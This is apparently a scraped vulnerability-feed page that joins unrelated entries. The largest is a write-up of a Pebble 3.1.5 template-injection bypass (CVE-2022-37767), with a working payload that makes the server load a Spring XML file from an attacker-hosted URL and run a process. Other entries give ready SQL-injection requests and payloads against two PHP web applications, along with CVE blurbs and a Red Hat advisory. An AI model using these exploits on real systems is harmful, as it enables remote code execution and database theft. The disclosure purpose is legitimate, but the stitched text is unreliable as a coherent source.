Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springbok

**Pebble 3.1.5 Bypass**

Pebble Templates 3.1.5 allows attackers to bypass a protection mechanism and implement arbitrary code execution with springboot，Here is my report.

First, simply set up an environment with the official documentation：https://pebbletemplates.io/

Pom.xml

<?xml version\="1.0" encoding\="UTF-8"?>
<project xmlns\="http://maven.apache.org/POM/4.0.0" xmlns:xsi\="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation\="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"\>
    <modelVersion\>4.0.0</modelVersion\>
    <parent\>
        <groupId\>org.springframework.boot</groupId\>
        <artifactId\>spring-boot-starter-parent</artifactId\>
        <version\>2.7.2</version\>
        <relativePath/> 
    </parent\>
    <groupId\>com.example</groupId\>
    <artifactId\>hackingpebble</artifactId\>
    <version\>0.0.1-SNAPSHOT</version\>
    <name\>hackingpebble</name\>
    <description\>hackingpebble</description\>
    <properties\>
        <java.version>1.8</java.version>
    </properties\>
    <dependencies\>
        <dependency\>
            <groupId\>org.springframework.boot</groupId\>
            <artifactId\>spring-boot-starter-web</artifactId\>
        </dependency\>
        <dependency\>
            <groupId\>io.pebbletemplates</groupId\>
            <artifactId\>pebble-spring-boot-starter</artifactId\>
            <version\>3.1.5</version\>
        </dependency\>

        <dependency\>
            <groupId\>org.springframework.boot</groupId\>
            <artifactId\>spring-boot-starter-test</artifactId\>
            <scope\>test</scope\>
        </dependency\>
    </dependencies\>

    <build\>
        <plugins\>
            <plugin\>
                <groupId\>org.springframework.boot</groupId\>
                <artifactId\>spring-boot-maven-plugin</artifactId\>
            </plugin\>
        </plugins\>
    </build\>

</project\>

com.example.hackingpebble.HackingpebbleApplication.java

package com.example.hackingpebble;

import com.mitchellbosecke.pebble.PebbleEngine;
import com.mitchellbosecke.pebble.loader.Loader;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;

@SpringBootApplication
public class HackingpebbleApplication {

    public static void main(String\[\] args) {
        SpringApplication.run(HackingpebbleApplication.class, args);
    }

}

com.example.hackingpebble.controller.Test.java

package com.example.hackingpebble.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;

@Controller
public class Test {

    @RequestMapping({"/"})
    public String getTemplate(@RequestParam String template) {
        return template;

    }

}

application.properties

pebble.prefix = templates
pebble.suffix = .pebble

And file structure as follows:  

When we control the parameter template we can render back the specified template file.

In previous versions, in order to mitigate command execution caused by malicious content in the template，pebble introduces a new security mechanism, which is implemented through the class BlacklistMethodAccessValidator.

In this class you can see a lot of restrictions, on the one hand, restricting the class to be an instance of certain classes, and on the other hand, restricting the execution of some methods

public class BlacklistMethodAccessValidator implements MethodAccessValidator {
    private static final String\[\] FORBIDDEN\_METHODS = new String\[\]{"getClass", "wait", "notify", "notifyAll"};

    public BlacklistMethodAccessValidator() {
    }

    public boolean isMethodAccessAllowed(Object object, Method method) {
        boolean methodForbidden = object instanceof Class || object instanceof Runtime || object instanceof Thread || object instanceof ThreadGroup || object instanceof System || object instanceof AccessibleObject || this.isUnsafeMethod(method);
        return !methodForbidden;
    }

    private boolean isUnsafeMethod(Method member) {
        return this.isAnyOfMethods(member, FORBIDDEN\_METHODS);
    }

    private boolean isAnyOfMethods(Method member, String... methods) {
        String\[\] var3 = methods;
        int var4 = methods.length;

        for(int var5 = 0; var5 < var4; ++var5) {
            String method = var3\[var5\];
            if (this.isMethodWithName(member, method)) {
                return true;
            }
        }

        return false;
    }

    private boolean isMethodWithName(Method member, String method) {
        return member.getName().equals(method);
    }
}

Look at the old version of exploit, loading any class by Class.forName，now，no class

{% set cmd = 'id' %}
{% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods\[6\]
     .invoke(null,null)
     .exec(cmd) %}

What can we do? So far we know that many instances of Spring applications are implicitly registered as beans, so can we find an object from a bean that holds a classloader object, and by getting it we can load any object by executing loadClass

By debugging we can easily export these beans objects

So we have to find some eligible beans among these classes

org.springframework.context.annotation.internalConfigurationAnnotationProcessor
org.springframework.context.annotation.internalAutowiredAnnotationProcessor
org.springframework.context.annotation.internalCommonAnnotationProcessor
org.springframework.context.event.internalEventListenerProcessor
org.springframework.context.event.internalEventListenerFactory
hackingpebbleApplication
org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory
test
org.springframework.boot.autoconfigure.AutoConfigurationPackages
org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration
propertySourcesPlaceholderConfigurer
org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration$TomcatWebSocketConfiguration
websocketServletWebServerCustomizer
org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration
org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryConfiguration$EmbeddedTomcat
tomcatServletWebServerFactory
org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration
servletWebServerFactoryCustomizer
tomcatServletWebServerFactoryCustomizer
org.springframework.boot.context.properties.ConfigurationPropertiesBindingPostProcessor
org.springframework.boot.context.internalConfigurationPropertiesBinderFactory
org.springframework.boot.context.internalConfigurationPropertiesBinder
org.springframework.boot.context.properties.BoundConfigurationProperties
org.springframework.boot.context.properties.EnableConfigurationPropertiesRegistrar.methodValidationExcludeFilter
server\-org.springframework.boot.autoconfigure.web.ServerProperties
webServerFactoryCustomizerBeanPostProcessor
errorPageRegistrarBeanPostProcessor
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletConfiguration
dispatcherServlet
spring.mvc\-org.springframework.boot.autoconfigure.web.servlet.WebMvcProperties
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletRegistrationConfiguration
dispatcherServletRegistration
org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration
org.springframework.boot.autoconfigure.task.TaskExecutionAutoConfiguration
taskExecutorBuilder
applicationTaskExecutor
spring.task.execution\-org.springframework.boot.autoconfigure.task.TaskExecutionProperties
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$WhitelabelErrorViewConfiguration
error
beanNameViewResolver
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$DefaultErrorViewResolverConfiguration
conventionErrorViewResolver
spring.web\-org.springframework.boot.autoconfigure.web.WebProperties
org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration
errorAttributes
basicErrorController
errorPageCustomizer
preserveErrorControllerTargetClassPostProcessor
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$EnableWebMvcConfiguration
requestMappingHandlerAdapter
welcomePageHandlerMapping
localeResolver
themeResolver
flashMapManager
mvcConversionService
mvcValidator
mvcContentNegotiationManager
requestMappingHandlerMapping
mvcPatternParser
mvcUrlPathHelper
mvcPathMatcher
viewControllerHandlerMapping
beanNameHandlerMapping
routerFunctionMapping
resourceHandlerMapping
mvcResourceUrlProvider
defaultServletHandlerMapping
handlerFunctionAdapter
mvcUriComponentsContributor
httpRequestHandlerAdapter
simpleControllerHandlerAdapter
handlerExceptionResolver
mvcViewResolver
mvcHandlerMappingIntrospector
viewNameTranslator
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter
defaultViewResolver
viewResolver
requestContextFilter
org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration
formContentFilter
com.mitchellbosecke.pebble.boot.autoconfigure.PebbleServletWebConfiguration
pebbleViewResolver
com.mitchellbosecke.pebble.boot.autoconfigure.PebbleAutoConfiguration
pebbleLoader
springExtension
pebbleEngine
pebble\-com.mitchellbosecke.pebble.boot.autoconfigure.PebbleProperties
org.springframework.boot.autoconfigure.jmx.JmxAutoConfiguration
mbeanExporter
objectNamingStrategy
mbeanServer
spring.jmx\-org.springframework.boot.autoconfigure.jmx.JmxProperties
org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration
springApplicationAdminRegistrar
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration$ClassProxyingConfiguration
forceAutoProxyCreatorToUseClassProxying
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration
org.springframework.boot.autoconfigure.availability.ApplicationAvailabilityAutoConfiguration
applicationAvailability
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$Jackson2ObjectMapperBuilderCustomizerConfiguration
standardJacksonObjectMapperBuilderCustomizer
spring.jackson\-org.springframework.boot.autoconfigure.jackson.JacksonProperties
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperBuilderConfiguration
jacksonObjectMapperBuilder
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$ParameterNamesModuleConfiguration
parameterNamesModule
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperConfiguration
jacksonObjectMapper
org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration
jsonComponentModule
jsonMixinModule
org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration
org.springframework.boot.autoconfigure.context.LifecycleAutoConfiguration
lifecycleProcessor
spring.lifecycle\-org.springframework.boot.autoconfigure.context.LifecycleProperties
org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration$StringHttpMessageConverterConfiguration
stringHttpMessageConverter
org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration$MappingJackson2HttpMessageConverterConfiguration
mappingJackson2HttpMessageConverter
org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration
org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration
messageConverters
org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration
spring.info\-org.springframework.boot.autoconfigure.info.ProjectInfoProperties
org.springframework.boot.autoconfigure.sql.init.SqlInitializationAutoConfiguration
spring.sql.init\-org.springframework.boot.autoconfigure.sql.init.SqlInitializationProperties
org.springframework.boot.sql.init.dependency.DatabaseInitializationDependencyConfigurer$DependsOnDatabaseInitializationPostProcessor
org.springframework.boot.autoconfigure.task.TaskSchedulingAutoConfiguration
scheduledBeanLazyInitializationExcludeFilter
taskSchedulerBuilder
spring.task.scheduling\-org.springframework.boot.autoconfigure.task.TaskSchedulingProperties
org.springframework.boot.autoconfigure.web.client.RestTemplateAutoConfiguration
restTemplateBuilderConfigurer
restTemplateBuilder
org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration$TomcatWebServerFactoryCustomizerConfiguration
tomcatWebServerFactoryCustomizer
org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration
org.springframework.boot.autoconfigure.web.servlet.HttpEncodingAutoConfiguration
characterEncodingFilter
localeCharsetMappingsCustomizer
org.springframework.boot.autoconfigure.web.servlet.MultipartAutoConfiguration
multipartConfigElement
multipartResolver
spring.servlet.multipart\-org.springframework.boot.autoconfigure.web.servlet.MultipartProperties
org.springframework.aop.config.internalAutoProxyCreator

Fortunately we quickly found a class that fit the criteria and it helped us get the classloader object

It is not enough to execute loadclass, we also need to instantiate the class. And It's also very simple, there is jackson among spring's dependencies, through jackson deserialization we can easily instantiate a class.

Fortunately there is this jacksonObjectMapper object in the beans.Now we can instantiate arbitrary classes, and by being able to instantiate arbitrary classes we have bypassed the filtering restrictions

In the spring scenario we can easily think of a configuration class org.springframework.context.support.ClassPathXmlApplicationContext, which allows us to load a remote xml configuration file, through which we can easily implement the command execution.

But...

At this point you will find that any class jackson that inherits from AbstractPointcutAdvisor and AbstractApplicationContext will not be allowed to instantiate

    public void validateSubType(DeserializationContext ctxt, JavaType type, BeanDescription beanDesc) throws JsonMappingException {
        Class<?> raw = type.getRawClass();
        String full = raw.getName();
        if (!this.\_cfgIllegalClassNames.contains(full)) {
            if (raw.isInterface()) {
                return;
            }

            if (full.startsWith("org.springframework.")) {
                Class cls = raw;

                while(true) {
                    if (cls == null || cls == Object.class) {
                        return;
                    }

                    String name = cls.getSimpleName();
                    if ("AbstractPointcutAdvisor".equals(name) || "AbstractApplicationContext".equals(name)) {
                        break;
                    }

                    cls = cls.getSuperclass();
                }
            } else if (!full.startsWith("com.mchange.v2.c3p0.") || !full.endsWith("DataSource")) {
                return;
            }
        }

        ctxt.reportBadTypeDefinition(beanDesc, "Illegal type (%s) to deserialize: prevented for security reasons", new Object\[\]{full});
    }

What to do at this time? We found a class called java.beans.Beans in jre.

The instantiate method of this class can help us instantiate arbitrary methods.

public static Object instantiate(ClassLoader cls, String beanName) throws IOException, ClassNotFoundException {
  return Beans.instantiate(cls, beanName, null, null);
}

Here the classloader parameter is allowed to be set to empty, if it is empty later will be through the ClassLoader.getSystemClassLoader (); get, of course, in fact, we also get a classloader at the top which is not the point，It will eventually return an instantiated object based on the beanName passed in.

if (result == null) {
  // No serialized object, try just instantiating the class
  Class<?> cl;

  try {
    cl = ClassFinder.findClass(beanName, cls);
  } catch (ClassNotFoundException ex) {
    // There is no appropriate class.  If we earlier tried to
    // deserialize an object and got an IO exception, throw that,
    // otherwise rethrow the ClassNotFoundException.
    if (serex != null) {
      throw serex;
    }
    throw ex;
  }

  if (!Modifier.isPublic(cl.getModifiers())) {
    throw new ClassNotFoundException("" + cl + " : no public access");
  }

  /\*
             \* Try to instantiate the class.
             \*/

  try {
    result = cl.newInstance();
  } catch (Exception ex) {
    // We have to remap the exception to one in our signature.
    // But we pass extra information in the detail message.
    throw new ClassNotFoundException("" + cl + " : " + ex, ex);
  }
}

So we get the ClassPathXmlApplicationContext class that was forbidden to be instantiated by indirect means.

So by stringing these points together we can easily get the following payload

{% set y\= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}
{% set yy =  beans.get("jacksonObjectMapper").readValue("{}", y) %}
{% set yyy = yy.instantiate(null,"org.springframework.context.support.ClassPathXmlApplicationContext") %}
{{ yyy.setConfigLocation("http://xxx.xxx.xxx/1.xml") }}
{{ yyy.refresh() }}

1.xml

<?xml version\="1.0" encoding\="UTF-8" ?>
    <beans xmlns\="http://www.springframework.org/schema/beans"
       xmlns:xsi\="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation\="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"\>
        <bean id\="pb" class\="java.lang.ProcessBuilder" init-method\="start"\>
            <constructor-arg >
            <list\>
                <value\>open</value\>
                <value\>-a</value\>
                <value\>calculator</value\>
            </list\>
            </constructor-arg\>
        </bean\>
    </beans\>

with http server in your vps

    python3 -m http.server 80
    

Successfully triggered command execution by template file called rce.pebble

CVE-2022-37767: command execution vulnerability in pebble 3.1.5(latest) · Issue #3 · Y4tacker/Web-Security

In Library Management System 1.0 the /card/in-card.php file id_no parameters are vulnerable to SQL injection.

    POST /LMS/card/id-card.php HTTP/1.1
    Host: 172.20.10.14
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Content-Length: 112
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=8l03mutpmr44pg0gv96afbujmn
    Origin: http://172.20.10.14
    Referer: http://172.20.10.14/LMS/card/id-card.php
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    
    id_no=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707171,0x686a467041767a434e5574435a446348437562755059707141736f7047694178686e787163596d6e,0x717a6a7a71),NULL#&search=

CVE-2022-37794: CVE_demo/Library Management System with QR code Attendance and Auto Generate Library Card - SQL injections.md at main · anx0ing/CVE_demo

In Apache Calcite prior to version 1.32.0 the SQL operators EXISTS_NODE, EXTRACT_XML, XML_TRANSFORM and EXTRACT_VALUE do not restrict XML External Entity references in their configuration, which makes them vulnerable to a potential XML External Entity (XXE) attack. Therefore any client exposing these operators, typically by using Oracle dialect (the first three) or MySQL dialect (the last one), is affected by this vulnerability (the extent of it will depend on the user under which the application is running). From Apache Calcite 1.32.0 onwards, Document Type Declarations and XML External Entity resolution are disabled on the impacted operators.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-39135

An issue was discovered in Active Intelligent Visualization 5. The Vdc header is used in a SQL query without being sanitized. This causes SQL injection.

**We would highly appreciate your valuable feedback to continuously improve our product and services.**

CVE-2021-44835: Active Intelligence | Data Visualization BI Tools

SmartVista SVFE2 v2.2.22 was discovered to contain multiple SQL injection vulnerabilities via the UserForm:j_id88, UserForm:j_id90, and UserForm:j_id92 parameters at /SVFE2/pages/feegroups/service_group.jsf.

An attacker requires an account on the SmartVista SVFE2. Attacker can use a quote character to break query string and inject sql payload to "UserForm:j\_id92" parameter (Description), don't use a quote character and inject sql payload to "UserForm:j\_id88", "UserForm:j\_id90" parameters (Group ID, Service ID), in /SVFE2/pages/feegroups/service\_group.jsf. Response data could help an attacker identify whether an injected SQL query is correct or not.

CVE-2022-38615: SQL Injection in Service Group feature of SmartVista SVFE2 version 2.2.22 (CVE-2022-38615)

Red Hat Security Advisory 2022-6407-01 - A minor version update is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section. Issues addressed include denial of service, information leakage, integer overflow, and resource exhaustion vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Integration Camel-K 1.8 security update  
Advisory ID:       RHSA-2022:6407-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6407  
Issue date:        2022-09-09  
CVE Names:         CVE-2020-9492 CVE-2020-27223 CVE-2020-36518   
                   CVE-2021-2471 CVE-2021-3520 CVE-2021-3629   
                   CVE-2021-20289 CVE-2021-22132 CVE-2021-22137   
                   CVE-2021-28163 CVE-2021-28164 CVE-2021-28165   
                   CVE-2021-37714 CVE-2021-38153 CVE-2021-40690   
=====================================================================

1. Summary:

A minor version update is now available for Red Hat Integration Camel K.  
The purpose of this text-only errata is to inform you about the security  
issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

A minor version update is now available for Red Hat Camel K that includes  
CVE fixes in the base images, which are documented in the Release Notes  
document linked in the References section.

Security Fix(es):

* hadoop: WebHDFS client might send SPNEGO authorization header  
(CVE-2020-9492)

* jetty: request containing multiple Accept headers with a large number of  
"quality" parameters may lead to DoS (CVE-2020-27223)

* jackson-databind: denial of service via a large depth of nested objects  
(CVE-2020-36518)

* mysql-connector-java: unauthorized access to critical (CVE-2021-2471)

* lz4: memory corruption due to an integer overflow bug caused by memmove  
argument (CVE-2021-3520)

* undertow: potential security issue in flow control over HTTP/2 may lead  
to DOS (CVE-2021-3629)

* elasticsearch: executing async search improperly stores HTTP headers  
leading to information disclosure (CVE-2021-22132)

* jetty: Symlink directory exposes webapp directory contents  
(CVE-2021-28163)

* jetty: Ambiguous paths can access WEB-INF (CVE-2021-28164)

* jetty: Resource exhaustion when receiving an invalid large TLS frame  
(CVE-2021-28165)

* jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck  
(CVE-2021-37714)

* Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients  
(CVE-2021-38153)

* xml-security: XPath Transform abuse allows for information disclosure  
(CVE-2021-40690)

* resteasy: Error message exposes endpoint class information  
(CVE-2021-20289)

* elasticsearch: Document disclosure flaw when Document or Field Level  
Security is used (CVE-2021-22137)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

1923181 - CVE-2021-22132 elasticsearch: executing async search improperly stores HTTP headers leading to information disclosure  
1925237 - CVE-2020-9492 hadoop: WebHDFS client might send SPNEGO authorization header  
1934116 - CVE-2020-27223 jetty: request containing multiple Accept headers with a large number of "quality" parameters may lead to DoS  
1935927 - CVE-2021-20289 resteasy: Error message exposes endpoint class information  
1943189 - CVE-2021-22137 elasticsearch: Document disclosure flaw when Document or Field Level Security is used  
1945710 - CVE-2021-28163 jetty: Symlink directory exposes webapp directory contents  
1945712 - CVE-2021-28164 jetty: Ambiguous paths can access WEB-INF  
1945714 - CVE-2021-28165 jetty: Resource exhaustion when receiving an invalid large TLS frame  
1954559 - CVE-2021-3520 lz4: memory corruption due to an integer overflow bug caused by memmove argument  
1977362 - CVE-2021-3629 undertow: potential security issue in flow control over HTTP/2 may lead to DOS  
1995259 - CVE-2021-37714 jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck  
2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients  
2011190 - CVE-2021-40690 xml-security: XPath Transform abuse allows for information disclosure  
2020583 - CVE-2021-2471 mysql-connector-java: unauthorized access to critical  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects

5. References:

https://access.redhat.com/security/cve/CVE-2020-9492  
https://access.redhat.com/security/cve/CVE-2020-27223  
https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-2471  
https://access.redhat.com/security/cve/CVE-2021-3520  
https://access.redhat.com/security/cve/CVE-2021-3629  
https://access.redhat.com/security/cve/CVE-2021-20289  
https://access.redhat.com/security/cve/CVE-2021-22132  
https://access.redhat.com/security/cve/CVE-2021-22137  
https://access.redhat.com/security/cve/CVE-2021-28163  
https://access.redhat.com/security/cve/CVE-2021-28164  
https://access.redhat.com/security/cve/CVE-2021-28165  
https://access.redhat.com/security/cve/CVE-2021-37714  
https://access.redhat.com/security/cve/CVE-2021-38153  
https://access.redhat.com/security/cve/CVE-2021-40690  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2022-Q3  
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q3

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxs70NzjgjWX9erEAQjJwA//SOV45S61jVwW0rWlStVD30gzBi4G/Smq  
hg/CV6OSMKd+SL5jivW1PPh1T6D30LEWCP4GnLSpDCx36MWGV8QOEL1e2PXAXJK3  
vQJbqAHjqIIERY41KJrCBZQ+jUQx1mlev6JRfOP+xvK9lCuwtk/FfhciDEBzbrJA  
OG6TLpSxHd8a9sqX0uT8WfXLAiJcU5ZShG87a6ZWfK/b7zvw54TD+V2VX8ob1CKB  
UCQZV2z7uzCopDqsfb1br3CMLj28WLCgyWdXM12SX+NPI0YZ+a9+zwAUnnT/Pumg  
Qy70O9l7Kr0/RcAiZYk05HG/EBq+dUg2KUkHCOZ+JtiC0wBwYXSLiJI2BQWQj2Zq  
NbQ8NQMVWBVslvOtP9CDQSthYjGDHZdyqBSXBFdmrevxbjcg+w8UrF6dMM67fbNs  
GPd5y9KgySeoWTmMdkfnBOrsiFXHkWcWvErKX3xn0DniLVFYlesIA5omETvLWzPc  
F/KJgb5nj/ObigbfLZo/kAd8zPX3atSatl6CZOejqly6irhTIfIMywkaNjJXU87p  
2MuaIyyZyMIvTOaPDhPoE/nGTj8B0fBoOLxFmDirNLcsJXOKLFgPIQnU5r/X0bb8  
lcoSrbHvbLHFTf0uTmVRepInph/+JWZ+phGBY/KeoMYY7KTmR5/RUR5smqych3Y7  
UtgibM+BGsU=  
=nU0B  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6407-01

Online Notice Board 2022 suffers from a remote SQL injection vulnerability.

    ## Title: ONLINE-NOTICE-BOARD-2022 SQLi## Author: nu11secur1ty## Date: 09.09.2022## Vendor: https://www.sourcecodester.com/users/razormist## Software: https://www.sourcecodester.com/php/14317/online-notice-board-system.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2022/ONLINE-NOTICE-BOARD-2022## Description:The `e` parameter from the ONLINE-NOTICE-BOARD-2022 system appears tobe vulnerable to SQL injection attacks.The malicious user can dump-steal the database, from this system andhe can use it for very malicious purposes.NOTE: The users of this system are NOT protected, this SQLvulnerability is CRITICAL!STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: e (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: e=MfbByvbe@glupakarazormist.net' OR NOT 5051=5051#Wypj&p=h8F!c4q!L9&save=Login    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: e=MfbByvbe@glupakarazormist.net' OR (SELECT 8344FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT(ELT(8344=8344,1))),0x7170767171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# ZBOm&p=h8F!c4q!L9&save=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: e=MfbByvbe@glupakarazormist.net' AND (SELECT 8661 FROM(SELECT(SLEEP(5)))LTGu)# mWpk&p=h8F!c4q!L9&save=Login    Type: UNION query    Title: MySQL UNION query (NULL) - 10 columns    Payload: e=MfbByvbe@glupakarazormist.net' UNION ALL SELECTNULL,CONCAT(0x716b626b71,0x4949414c667070706f614c784d7468616265424b595148715870516c437744516473687567795478,0x7170767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p=h8F!c4q!L9&save=Login---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2022/ONLINE-NOTICE-BOARD-2022)## Proof and Exploit:[href](https://streamable.com/4u9diy)

Online Notice Board 2022 SQL Injection

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in All in One SEO plugin <= 4.2.3.1 at WordPress.

CVE-2022-38093: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress.

CVE-2022-38144: wpForo Forum

JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/site/list.

Administrator login is required. The default account password is admin:admin123

**admin/article/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successful injection at route admin/article/list

**admin/article/list\_approve**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/article/list_approve

**admin/comment**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/comment/list

**admin/contact/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/contact/list

**admin/foldernotice/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/foldernotice/list

**admin/folderrollpicture/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/folderrollpicture/list

**admin/friendlylink/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/friendlylink/list

**admin/imagealbum/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/imagealbum/list

**admin/image/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/image/list

**admin/site/list**

There is a SQLI vul in background mode.The route is as following

vulnerable argument passing is as following

Successfully injected at route admin/site/list

Tag

#sql